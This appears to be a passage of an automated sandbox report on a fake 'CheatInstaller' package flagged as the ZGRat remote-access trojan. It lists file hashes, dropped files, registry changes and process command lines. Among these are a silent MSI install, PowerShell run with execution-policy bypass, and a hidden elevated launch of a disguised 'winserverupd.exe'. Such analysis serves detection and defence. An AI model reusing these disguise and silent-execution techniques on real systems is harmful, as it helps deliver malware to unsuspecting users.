| SHA512 | 85c5095099f7a689e5dd125ad8805b90f59a0e4a930ea791383a596e722d56fa62e4f85c28365c01a6ef2c3b4ddd0e53eb6a70777ad94070b49602993497a64f |
memory/2412-3637-0x000000001B3A0000-0x000000001B682000-memory.dmp
memory/2412-3638-0x0000000002450000-0x0000000002458000-memory.dmp
memory/2412-3639-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp
memory/2412-3640-0x00000000029A0000-0x0000000002A20000-memory.dmp
memory/2412-3641-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\pssCA25.ps1
| MD5 | a8a3a992fce81410c5771c10f743f6ba |
| SHA1 | d0dd0c52514afa2150b250e549dfebf87758f191 |
| SHA256 | bd580ea3519d7b9c2bc34d30b66af13f580ee5beb1ce828499f607300dbd9bee |
| SHA512 | 3edf26ba7095e2532cd0257f50a65c9f71eb85b768f27237f0bf538409cea74e12bbcec01bc0120f9d53bfb6a94b4bac21a17595e259ee23d1a36fbf4615c830 |
C:\Users\Admin\AppData\Local\Temp\scrCA14.ps1
| MD5 | 61222e0e2596b5dc3f046a8e75afcdf6 |
| SHA1 | 3d3226444ec4d5d32c6340e3a47385c6520b0a99 |
| SHA256 | e7c32bdc77350c6cf13b6ece42742359ea5fc17a0e45cd3d6611966906b5b089 |
| SHA512 | 63e29193859c7961372a192345be4860a8a5001c7de313789e1f5cc49d6926a687e21bf0b5a7d412ee8613e7c6c4ab710b68f5567afc477b100f74706712603e |
memory/2412-3644-0x00000000029A0000-0x0000000002A20000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\scrCA15.txt
| MD5 | 64d1817b6bfcd6cfda309f8910f51b57 |
| SHA1 | 9faf2d4a707b789de6970b53b0dc80ac47ec3c52 |
| SHA256 | 067838889a9eeb91ecb3fc155f3bfed21bd86d8c789d6485cca2a6d6a6bd4391 |
| SHA512 | d51ec763f8f2920782d958c84a5fb96d7e80382d88bc9a41ec0ca6e2570ebb328389ead37e4042c83d025a1e3580444f6374ffa015374d6c20c75f9ec85ba7ee |
C:\Users\Admin\AppData\Local\Temp\progressbad.bat
| MD5 | d3dff05f50e0edcecca77d97468a1aef |
| SHA1 | 87a217697bd981c8a9dc5a94ae65daf3ece5f081 |
| SHA256 | 86cad2a008f8a7be294be384100f6c0cc0cc4bbdb154174b81ea8c61bc85748e |
| SHA512 | 0b897b0697b3beb69dbe22db514ce53f3fb0b456fc14b79e4719b840bf17165a594a052230f2242647cf0fc047b4066461aa5af5289d5869926d16189dc8f005 |
memory/2412-3707-0x00000000029A0000-0x0000000002A20000-memory.dmp
memory/2412-3708-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\mock-globals\.gitignore
| MD5 | 8da13f306c8c0f4f4a32960e93725b42 |
| SHA1 | b9ee3f4a8b64284a8f698206993e4ec2cf83f66f |
| SHA256 | ca7a3d5544beb40beb598f6ae22527e8cbcbc29b67f241ad9e572a50a89848b0 |
| SHA512 | 59e6493139d8a3af2889fb337032f41124a53f5ca7ee06906c97d4f6cf0fa942f28b3b7ce2d449b10ea0a01a39282397984ea46df43571d2a5fe753fc20bb6cc |
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-18 14:42
Reported
2024-03-18 14:49
Platform
win10-20240221-en
Max time kernel
102s
Max time network
308s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ZGRat
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe | N/A |
| N/A | N/A | C:\Windows\Installer\MSIF28E.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe | N/A |
Loads dropped DLL
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 | C:\Windows\syswow64\MsiExec.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\syswow64\MsiExec.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 | C:\Windows\syswow64\MsiExec.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\syswow64\MsiExec.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\syswow64\MsiExec.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\syswow64\MsiExec.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_piano.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavenet_r9y9.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_sc09.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\db.frm | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_tatum.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_birds.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_samplernn.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_timit.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_piano.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_timit.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\lang_fre.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_birds.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_specgan.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_drums.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_birds.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\help_topic.frm | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_drums.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_ps2.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_sc09.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_ps4.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\lang_ita.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\event.csv | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\general_log.frm | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\help_relation.MYI | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_sc09.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_parametric.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_timit.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavenet_ibab.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_drums.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_piano.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\slow_log.frm | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_sc09.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_timit.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\db.MYI | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_piano.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_birds.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_drums.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_pp.wav | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\MSIFB39.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFBD7.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIE2A.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e57f725.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI109D.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI3D65.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF28E.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFC83.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF73.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{AA26797C-3E2C-42C1-A832-A687DE957A1C} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF29F.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e57f721.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI352D.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI361A.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI37B4.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI3D35.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e57f721.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI353E.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI3679.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI392C.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI3B11.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF9D1.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFD8E.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI36C8.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIECD0.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFE79.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\syswow64\MsiExec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\syswow64\MsiExec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\syswow64\MsiExec.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Caphyon | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer | C:\Windows\syswow64\MsiExec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\syswow64\MsiExec.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | C:\Windows\syswow64\MsiExec.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C} | C:\Windows\syswow64\MsiExec.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C}\C:\Users\Admin\AppData\Local\Temp\ferght6fj54f.txt = "*" | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\syswow64\MsiExec.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\syswow64\MsiExec.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\ProductName = "CheatInstaller" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\OpenSource\\CheatInstaller 2.32\\install\\E957A1C\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C79762AAC2E31C248A236A78ED59A7C1 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\PackageCode = "9860C08E1459A8B42A7F241C2213136F" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\PackageName = "YTtSTCHEAT.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\OpenSource\\CheatInstaller 2.32\\install\\E957A1C\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C79762AAC2E31C248A236A78ED59A7C1\MainFeature | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Language = "1033" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media\DiskPrompt = "[1]" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Version = "35651584" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FA1A2714FC38171429580C777D5579A9 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FA1A2714FC38171429580C777D5579A9\C79762AAC2E31C248A236A78ED59A7C1 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\RUN.exe
"C:\Users\Admin\AppData\Local\Temp\RUN.exe"
C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe
.\Install_YTTCHTs.exe
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding EE8884940FF6512E553F6BFACBDBDC93 C
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi" /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1710532419 " ALLUSERS="1"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 944441AC5B7ECC4E47752AE24CCA0060
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssFF91.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiFF7E.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrFF7F.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrFF80.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\progressgood.bat" "
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding B3D2C63B65644E827E8E739EC4F08D8C E Global\MSI0000
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\Installer\MSIF28E.tmp
"C:\Windows\Installer\MSIF28E.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
